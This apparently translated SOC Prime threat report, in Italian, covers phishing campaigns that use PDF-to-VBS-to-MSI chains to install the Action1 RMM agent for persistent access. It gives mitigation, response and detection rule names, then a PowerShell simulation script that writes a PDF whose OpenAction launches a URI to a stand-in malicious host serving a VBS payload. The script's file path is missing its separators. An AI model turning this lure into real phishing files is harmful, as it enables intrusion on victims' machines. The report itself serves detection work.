SOC Prime Bias: High

06 Oct 2026 14:36 UTC

L’abuso degli strumenti RMM continua a crescere in campagne di minacce attive

Author Photo
SOC Prime Team linkedin icon Segui
L’abuso degli strumenti RMM continua a crescere in campagne di minacce attive
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Gli attori delle minacce stanno abusando degli strumenti di Gestione e Monitoraggio da Remoto (RMM), in particolare Action1, per stabilire un accesso persistente all’interno degli ambienti compromessi. L’attacco inizia con un’email di phishing contenente un PDF malevolo che reindirizza le vittime a un file VBS. Lo script quindi scarica e installa un pacchetto MSI contenente l’agente Action1 legittimo, abilitando l’accesso remoto non autorizzato.

Indagine

L’indagine ha scoperto un PDF malevolo che sfrutta le parole chiave OpenAction e URI per iniziare un download da un URL ospitato su Vercel. L’analisi del pacchetto MSI recuperato ha rivelato file legittimi di Action1 Corporation utilizzati impropriamente tramite l’infrastruttura cloud del venditore stesso. L’agente installato contiene un CustomerID specifico e comunica con un dominio Action1 legittimo.

Mitigazione

Le organizzazioni dovrebbero configurare il filtraggio delle email per identificare strutture PDF sospette contenenti parole chiave OpenAction o URI. I team di sicurezza dovrebbero monitorare installazioni non autorizzate degli strumenti RMM e la creazione del servizio A1Agent. Bloccare le connessioni all’infrastruttura cloud RMM inaspettata e identificare CustomerID insoliti o non autorizzati può inoltre ridurre il rischio di abuso dell’accesso remoto.

Risposta

Quando viene rilevata un’attività RMM malevola, isolare l’host colpito per prevenire ulteriori esecuzioni di comandi remoti. Indagare sull’email di phishing originaria e condurre un’analisi forense del VBS associato e dei file MSI. Revocare le credenziali potenzialmente compromesse e rivedere le configurazioni dell’agente Action1 per indicatori di accesso remoto non autorizzato o persistenza.

Flusso di Attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

LOLBAS WScript / CScript (tramite process_creation)

Team di SOC Prime
06 ott 2026

Software di Accesso / Gestione Remoto Alternativo (tramite process_creation)

Team di SOC Prime
06 ott 2026

Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (tramite proxy)

Team di SOC Prime
06 ott 2026

Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (tramite dns)

Team di SOC Prime
06 ott 2026

Possibile Attività di Comando e Controllo mediante Tentativo di Comunicazione del Dominio di Software di Accesso Remoto (tramite dns)

Team di SOC Prime
06 ott 2026

IOC (HashSha256) da rilevare: Più Strumenti RMM Nella Natura

Regole AI di SOC Prime
06 ott 2026

Connessione Remota ai Server Aziendali Action1 [Connessione di Rete di Windows]

Regole AI di SOC Prime
06 ott 2026

PDF OpenAction e Reindirizzamento URI a VBS Malevolo [Evento File di Windows]

Regole AI di SOC Prime
06 ott 2026

Esecuzione della Simulazione

  • Narrativa dell’Attacco & Comandi: L’avversario sta simulando una campagna di phishing. L’obiettivo è consegnare un file chiamato Ricevuta di Transazione .pdf a una vittima. Il PDF è appositamente creato in modo tale che non appena l’utente lo apre, il comando /OpenAction attiva un /URI reindirizzamento. Questo reindirizzamento è progettato per portare l’utente a un sito che serve un VBScript malevolo. Per attivare la regola di rilevazione specifica fornita, creeremo un file con il nome esatto e le stringhe interne richieste.

  • Script di Test di Regressione:

    # Script di Simulazione: Attivazione del Rilevamento OpenAction del PDF
    $targetFile = "$env:USERPROFILEDesktopRicevuta di Transazione .pdf"
    
    # Creazione del contenuto PDF "malevolo" per corrispondere alle parole chiave di rilevazione
    $pdfContent = @"
    %PDF-1.1
    1 0 obj
    << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >>
    endobj
    2 0 obj
    << /Type /Pages /Parent 1 0 R /Count 1 >>
    endobj
    trailer
    << /Root 1 0 R >>
    %%EOF
    "@
    
    # Scrittura del file su disco per attivare il rilevamento 'file_event'
    $pdfContent | Out-File -FilePath $targetFile -Encoding ascii
    
    Write-Host "File di simulazione creato in: $targetFile"
    Write-Host "Controlla il tuo SIEM per l'allerta di rilevamento."
  • Comandi di Pulizia:

    # Pulizia: Rimozione del file malevolo simulato
    $targetFile = "$env:USERPROFILEDesktopRicevuta di Transazione .pdf"
    if (Test-Path $targetFile) {
        Remove-Item -Path $targetFile -Force
        Write-Host "Pulizia completata: $targetFile rimosso."
    } else {
        Write-Host "Pulizia: File non trovato."
    }